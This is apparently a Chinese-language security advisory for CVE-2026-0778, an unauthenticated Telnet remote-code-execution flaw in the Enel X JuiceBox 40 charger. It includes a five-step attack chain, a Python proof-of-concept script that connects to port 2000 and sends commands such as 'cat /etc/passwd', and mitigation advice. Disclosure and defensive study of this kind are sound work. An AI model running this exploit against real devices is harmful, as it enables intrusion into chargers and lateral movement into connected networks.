CVE-2026-0778: Enel X JuiceBox 40 Telnet服务未授权远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-0778

漏洞类型

远程代码执行、身份验证缺失

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Enel X JuiceBox 40充电站

漏洞概述

CVE-2026-0778是Enel X JuiceBox 40智能充电站中的一个严重安全漏洞。该漏洞存在于设备默认启用的Telnet服务中，由于缺乏身份验证机制，允许网络邻接的攻击者无需任何凭证即可连接到TCP端口2000并执行任意代码。攻击者可以完全控制充电站设备，以服务账户权限运行恶意代码，可能导致充电站功能中断、用户数据泄露或进一步渗透内网。该漏洞CVSS评分高达8.8，属于高危级别，对部署了该设备的组织和个人构成严重安全威胁。ZDI（零日倡议）已披露此漏洞，编号为ZDI-CAN-23285。由于充电站通常连接到企业网络或家庭网络，攻击者可能利用此漏洞作为网络入口点进行横向移动。

技术细节

该漏洞的根本原因是Enel X JuiceBox 40设备的Telnet服务（默认监听TCP端口2000）在接受远程连接前未实施任何身份验证机制。Telnet协议本身以明文传输数据，缺乏加密和认证保护。当设备启动Telnet服务时，任何能够访问该设备网络的主机都可以无需用户名和密码直接建立连接。攻击者通过发送特制的命令或利用Telnet协议特性，可以在设备上执行操作系统命令，从而实现远程代码执行。由于攻击以服务账户权限执行，攻击者可以获取设备的完全控制权，包括读取配置信息、修改充电参数、窃取网络凭据等操作。该漏洞利用复杂度低，无需复杂的攻击工具即可实现，对攻击者技术要求较低。

攻击链分析

STEP 1

步骤1

攻击者发现目标Enel X JuiceBox 40设备在TCP端口2000上开放Telnet服务

STEP 2

步骤2

攻击者使用Telnet客户端或自定义工具直接连接目标设备，无需任何认证凭证

STEP 3

步骤3

成功建立连接后，攻击者通过Telnet会话向设备发送操作系统命令

STEP 4

步骤4

设备以服务账户权限执行攻击者注入的命令，实现远程代码执行

STEP 5

步骤5

攻击者获取设备完全控制权，可以窃取数据、修改配置或作为跳板进行内网横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-0778 PoC - Enel X JuiceBox 40 Telnet RCE
Note: This PoC is for authorized security testing only
"""
import socket
import sys

def exploit_juicebox_telnet(target_ip, target_port=2000):
    """
    Exploit for CVE-2026-0778: Missing authentication in Enel X JuiceBox 40 Telnet service
    """
    try:
        print(f"[*] Connecting to {target_ip}:{target_port}")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Wait for telnet banner/prompt
        response = sock.recv(1024)
        print(f"[+] Received response: {response}")
        
        # Send command to execute (example: show system info)
        # Adjust command based on target system
        commands = [
            b"id\n",
            b"cat /etc/passwd\n",
            b"uname -a\n"
        ]
        
        for cmd in commands:
            print(f"[*] Sending command: {cmd.decode().strip()}")
            sock.send(cmd)
            output = sock.recv(4096)
            print(f"[+] Output:\n{output.decode()}")
        
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 2000
    exploit_juicebox_telnet(target, port)

影响范围

Enel X JuiceBox 40 (所有未修复版本)

防御指南

临时缓解措施

在网络层面禁用或限制对TCP端口2000的访问，只允许受信任的管理IP连接；如非必要，联系厂商禁用Telnet服务并升级到最新的安全固件版本；同时在充电站网络与其他关键系统之间部署网络隔离和防火墙策略，防止攻击者利用受损设备进行横向渗透。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0778
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0778
3 Details https://www.cvedetails.com/cve/CVE-2026-0778/
4 VulDB https://vuldb.com/cve/CVE-2026-0778
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-041/